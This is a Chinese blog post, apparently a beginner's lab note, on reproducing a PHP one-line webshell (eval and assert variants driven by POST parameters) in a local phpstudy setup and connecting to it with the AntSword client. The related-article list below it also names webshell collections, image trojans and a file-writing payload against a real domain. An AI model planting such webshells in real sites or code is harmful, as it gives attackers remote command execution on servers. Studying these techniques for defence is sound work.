复现php一句话木马

最新推荐文章于 2023-06-21 21:24:23 发布
最新推荐文章于 2023-06-21 21:24:23 发布
阅读量804 收藏 2
点赞数
文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50646296/article/details/125959068
版权

在phpstudy-pro中,开启apache,MySQL,在WWW目录中创建php文件,在该php文件中进行代码的编写

<?php
eval($_POST['2']);
?>

打开中国蚁剑测试

输入测试的本地地址,连接密码输入2,编码格式选择base64,点击测试连接

 当显示连接成功时,点击添加,双击添加的那条记录,看见网站 内容和目录结构,代表已经和成功了。

 修改一下php文件

<?php
$_POST['1']($_POST['2']);
?>

eval的规则:eval是一个语言构造器,他不是一个函数,所以不能被可变函数进行调用。

使用assert;assert也可以执行任意命令,

显示连接成功 。

熬夜且瞌睡
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP一句话木马深度详细剖析
Cwillchris的博客
06-01 1312
PHP一句话木马原理分析
QQ查询信息php,查询QQ信息
weixin_30823465的博客
03-11 3382
# :-: 介绍* 目前只能查询的有:QQ昵称、QQ头像、QQ邮箱。* 接口有时会不稳定,但一旦出现问题,我们技术人员会第一时间进行维修!# :-: 代码说明* 本接口采用GET和POST方式提交,JSON返回方式返回信息。* 提交地址:`https://api.berfen.com/api/qqcx.php`## :-: 在线测试* 测试QQ:1406094144* 测试...
复现一句话木马
lml_0916的博客
07-23 389
发现了2的值是直接输入的的一些PHP获取文件的函数的字符串,但是assert()函数的参数不可以使用字符串。首先右键添加一个新的数据,将刚刚编写的文件名输入到URL地址中,然后连接密码设置的是2。这样的话同时满足了assert()的参数必须是函数和表达式中的一种,和eval语句中有可以传递的参数,所以连接成功。解决的方式就是修改了一下我的php版本,一开始我用实验的版本是7.3.4的,后面改成了5.3.29的版本扣可以了、但是刚刚直接使用eval进行连接的时候是可以连接的,为什么这样替换就不可以了?....
一句话木马(绝对入门,实战环境安装+测试)主要是记录我的第一次一句话木马过程,复现40分钟左右。
ntrybw的博客
06-21 649
变成一个可执行代码,然后就可以传入并且执行,这个代码的作用就是可以让你接触到服务器,然后获得服务器的控制权,就等于完成了渗透操作,卧槽,第一次接触,发现真的好有意思。之后也就等于拿到了这个服务器的权限,不得不说,日站是真有意思,比misc好玩多了,怪不得学渗透可以没日没夜,太有意思了,这只是一个开始,有感而发记录一下。传完之后告诉我success,然后给了一个文件路径,因为这个网站在我本地,所以我可以在本地看一下,就可以在本地这个目录下发现这个文件。现实渗透肯定没有那么简单,不过深入,沉淀,网安之路。
php 木马程序,由PHP木马程序带来的实战入侵
weixin_30356603的博客
03-09 364
PHP文件中插入下边这句话,程序顷刻间就成能变身为木马程序。test.php文件内容:访问:http://www.qichunquanze.cn/test.php?c=你想用的各种PHP语句体比如我的使用方式是这样的:http://www.qichunquanze.cn/test.php?c=fputs(fopen("hacker.php","w"),"Hello,Hacker!");这个是时候...
强网杯SQL题目复现php.zip
12-17
提到的“SQL题目复现php.zip”表明这是一个用于帮助参赛者理解和解决SQL相关问题的PHP代码集合,可能包括了模拟攻击或防御的场景。 【标签】"sql php 强网杯SQL题目复现php.zip" 标签明确了主要涉及的技术领域,即...
numpy复现xgboost算法内含数据集
10-16
在机器学习领域,XGBoost是一种广泛使用的梯度提升决策树库,它以其高效、灵活和准确而闻名。本主题将深入探讨如何使用基础的NumPy库来复现XGBoost算法的核心概念,这对于理解其工作原理和进行性能优化非常有帮助。 ...
复现一篇论文中的FSR
04-18
吸透一体FSS,初次练手复现,跑了半天跑不出来,不知道问题出在哪,以后再研究
Python知识点以及assert利用蚁剑登录
qq_56724164的博客
08-05 162
一. 1.变量 变量不仅可以是数字,还可以是任意数据类型。 在Python程序中,变量是用一个变量名表示,变量名必须是大小写英文、数字和下划线(_)的组合,且不能用数字开头。 静态语言在定义变量时必须指定变量类型,如果赋值的时候类型不匹配,就会报错。 Python 变量的数据类型可以随时改变,比如,同一个变量可以一会儿被赋值为字符串,一会儿被赋值为整数。 2.字符串(str)的使用也非常广泛,可以使用引号('或")来创建字符串。 3.注释 任何时候,我们都可以给程序加上注释。注释是用来说明代码的,给自己或别
PHP变量函数(可变函数)
sinat_34463728的博客
04-09 472
PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。 function fo
PHP一句话木马集合
热门推荐
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
php 图片木马,php图片木马实现原理
weixin_27310417的博客
03-09 4379
什么是木马木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php的木马是长什么样的呢?我们来看下面这段代码:...
图片php木马制作教程,图片木马制作大法
weixin_39708854的博客
03-28 2621
0x01什么是图片木马?图片木马在网络上没有统一的定义,在这里我给出自己的定义。图片木马是一张能正常显示又包含恶意代码(比如一句话木马)的图片文件。根据定义我们知道图片木马两个条件:图片能正常显示包含能执行的而已代码总体思路:将恶意代码写在图片文件中非图片数据区,防止写入导致图片损坏。常规的图片格式有gif,png,jpg格式0x02将恶意代码写在图片尾部适合格式:任何图片格式方法一:copy法准...
木马学习笔记 1【一句话木马篇】
Sp4rkW的博客
10-27 7104
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理 1.最最最最基础一句话 eval($_POST["...
深究用户利用.htaccess的原理篡改配置导致的安全问题
蚁景网安学院
06-17 589
前言搞过ctf的师傅们大多都了解到,文件上传的时候经常使用.htaccess进行攻击;但是只了解那浅层的概念在很多时候是行不通的,比如下面这个题;我先把源码贴出来;借这个实例,深入理解....
PHP一句话木马后门
chuangqudiao9845的博客
03-23 2492
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。 一句话木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去...
SQL注入篇——一句话木马
爱国小白帽
01-08 6405
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
突破性一句话木马
hackerie的博客
11-02 1045
几个变异的asp–过防火墙 过狗效果都不错
那些强悍的PHP一句话后门
weixin_30338461的博客
05-11 1976
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
怎样修复DVWA一句话木马
最新发布
06-27
如果遇到DVWA中的“一句话木马”漏洞,通常需要采取以下步骤来修复: 1. **确认漏洞位置**:首先确定是哪个文件或代码行存在木马,DVWA中的漏洞可能存在于SQL查询、文件包含或用户输入处理部分。 2. **修改源代码*...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值